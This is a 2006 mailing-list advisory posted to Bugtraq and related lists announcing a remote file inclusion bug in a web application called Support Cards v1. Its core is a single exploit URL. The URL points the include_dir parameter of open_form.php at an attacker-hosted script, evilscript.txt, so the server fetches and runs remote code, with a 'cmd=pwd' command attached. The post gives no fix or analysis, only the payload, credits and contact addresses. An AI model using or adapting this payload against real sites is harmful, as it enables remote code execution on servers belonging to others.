
Date: Tue, 30 May 2006 23:26:57 +0300
From: "black code" <black-cod3@...mail.com>
To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com,
	content@...uritydot.net, listadmin@...urityfocus.com,
	MAILER-DAEMON@...ta.fr, MAILER-DAEMON@...lex05.paran.com,
	postmaster@...an.com, root@...uritydot.net, str0ke@...w0rm.com,
	submit@...w0rm.com, webmaster@...urityfocus.com, bugtraq@...ph3us.org
Subject: file include exploit in Support Cards v1


file include exploit in Support Cards v1

forum type : Support cards v1
bug found by : sweet-devil
team : site-down
type : file include

####################################################
exploit :


http://www.example.com/support/include/open_form.php?include_dir=http://ursite/evilscript.txt?cmd=pwd

####################################################


#######################
emails:

black-cod3@...mail.com  &  gamr-14@...mail.com
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/



